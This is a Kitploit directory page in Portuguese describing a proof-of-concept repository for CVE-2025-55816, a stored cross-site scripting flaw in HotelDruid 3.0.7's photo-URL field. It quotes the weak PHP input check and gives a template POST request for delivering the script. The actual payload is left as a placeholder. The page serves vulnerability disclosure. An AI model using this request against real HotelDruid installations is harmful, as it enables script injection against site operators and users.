Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55816 — CVE-2025-55816 HotelDruid 3.0.7 | Kitploit
Ferramentas/GitHubGitHub/partywavesec/cve-2025-55816
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubpartywavesec/cve-2025-55816

CVE-2025-55816

CVE-2025-55816 HotelDruid 3.0.7

Ver Repositório
há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55816

CVE-2025-55816 HotelDruid 3.0.7

  • Autor: partywave
  • Colaboração: Raptx team

Referências externas

  • Changelog do HotelDruid 3.0.8
  • Postagem no blog sobre o CVE
  • Site da Raptx

Vulnerabilidade

A vulnerabilidade é um simples Stored Cross Site Scripting (XSS) no endpoint /modifica_app.php.

O atacante pode inserir um payload de JavaScript disfarçado de URL no recurso 'Nova URL da Foto' devido à falta de medidas de segurança.

O código vulnerável está disponível no HotelDruid <= 3.0.7 no arquivo www\modifica_app.php em:

root@kitploit:~
if (!empty($aggurlfoto)) {
    $mostra_form_modifica = "NO";
    $dest = "#aggfoto";
    $errore = "";

    if (@get_magic_quotes_gpc()) {
        $n_urlfoto = stripslashes($n_urlfoto);
    }

    $lowurl = strtolower($n_urlfoto);

    if (
        substr($lowurl, -4) != ".jpg" &&
        substr($lowurl, -5) != ".jpeg" &&
        substr($lowurl, -4) != ".gif" &&
        substr($lowurl, -4) != ".png" &&
        substr($lowurl, -5) != ".webp"
    ) {
        $errore = "SI";
    }

    if (
        str_replace("<", "", $n_urlfoto) != $n_urlfoto ||
        str_replace(">", "", $n_urlfoto) != $n_urlfoto ||
        str_replace("\"", "", $n_urlfoto) != $n_urlfoto
    ) {
        $errore = "SI";
    }

A vulnerabilidade pode levar a uma exploração mais aprofundada. Uma pequena análise de código e desenvolvimento de payload está disponível na postagem do blog.

Requisição HTTP

Você pode enviar o payload usando a seguinte requisição POST:

root@kitploit:~
POST /modifica_app.php HTTP/1.1
Host: 127.0.0.1:57146
....
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Length: 1121
....

------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="anno"

[year]
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="id_sessione"

[sessionid]
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="idappartamenti"

[apartmentid]
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="aggurlfoto"

SI
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d
Content-Disposition: form-data; name="n_urlfoto"

[payload]
------geckoformboundaryae028810ee8a343ef5708f8da08a7d1d--
Baixar ferramenta